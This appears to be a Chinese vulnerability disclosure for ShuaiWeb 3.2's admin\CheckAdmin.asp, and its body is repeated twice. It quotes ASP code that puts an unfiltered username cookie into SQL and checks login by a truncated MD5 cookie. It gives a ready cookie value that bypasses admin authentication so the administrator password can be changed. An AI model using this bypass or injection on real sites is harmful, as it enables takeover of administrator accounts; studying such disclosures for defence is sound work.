VULHUB ™

### 简要描述： 因代码逻辑错误,可以构造语句绕过,直接修改管理员密码 ### 详细说明： 最新版的3.2下的 admin\CheckAdmin.asp ``` username = request.Cookies("username") password = request.Cookies("password") cookies_md5 = request.Cookies("cookies_md5") dim admin_name,admin_pass,admin_qx,admin_aqx set rs = server.createobject("adodb.recordset") sql="select * from shuaiweb_vipadministrator where username='"&username&"'" rs.open sql,dbok,1,1 admin_name = rs("username") admin_pass = rs("password") admin_qx = rs("wait_ader") admin_aqx = rs("wait_adyi") rs.Close set rs=nothing response.write sql if cookies_md5 <> left(MD5(username&password),10) then response.write "登录超时，请重新登录!" response.cookies("username") = "" response.cookies("password") = "" response.end end if ``` username没有过滤直接进入sql,也算一个注入了... 下面一段代码 if cookies_md5 <> left(MD5(username&password),10) then .... end if 可以构造语句绕过 Cookie:username=admin; password=aaaaa;cookies_md5=84d8e258de [<img src="https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png"...

### 简要描述： 因代码逻辑错误,可以构造语句绕过,直接修改管理员密码 ### 详细说明： 最新版的3.2下的 admin\CheckAdmin.asp ``` username = request.Cookies("username") password = request.Cookies("password") cookies_md5 = request.Cookies("cookies_md5") dim admin_name,admin_pass,admin_qx,admin_aqx set rs = server.createobject("adodb.recordset") sql="select * from shuaiweb_vipadministrator where username='"&username&"'" rs.open sql,dbok,1,1 admin_name = rs("username") admin_pass = rs("password") admin_qx = rs("wait_ader") admin_aqx = rs("wait_adyi") rs.Close set rs=nothing response.write sql if cookies_md5 <> left(MD5(username&password),10) then response.write "登录超时，请重新登录!" response.cookies("username") = "" response.cookies("password") = "" response.end end if ``` username没有过滤直接进入sql,也算一个注入了... 下面一段代码 if cookies_md5 <> left(MD5(username&password),10) then .... end if 可以构造语句绕过 Cookie:username=admin; password=aaaaa;cookies_md5=84d8e258de [<img src="https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png" alt="QQ截图20140704020649.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png) [<img src="https://images.seebug.org/upload/201407/040211091bef5181fa73945cd205d4ed3f531044.png" alt="QQ截图20140704021043.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/040211091bef5181fa73945cd205d4ed3f531044.png) 提交密码后还得修改下cookie才能提交成功,口令是不是只能在文件中修改... [<img src="https://images.seebug.org/upload/201407/04022250a86944dbbc71b8e5e52d7cc56cf66b72.png" alt="QQ截图20140704022237.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/04022250a86944dbbc71b8e5e52d7cc56cf66b72.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png" alt="QQ截图20140704020649.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/0402071010fb8a242528856a975dad8a2164e7b8.png) [<img src="https://images.seebug.org/upload/201407/040211091bef5181fa73945cd205d4ed3f531044.png" alt="QQ截图20140704021043.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/040211091bef5181fa73945cd205d4ed3f531044.png) [<img src="https://images.seebug.org/upload/201407/04022250a86944dbbc71b8e5e52d7cc56cf66b72.png" alt="QQ截图20140704022237.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/04022250a86944dbbc71b8e5e52d7cc56cf66b72.png)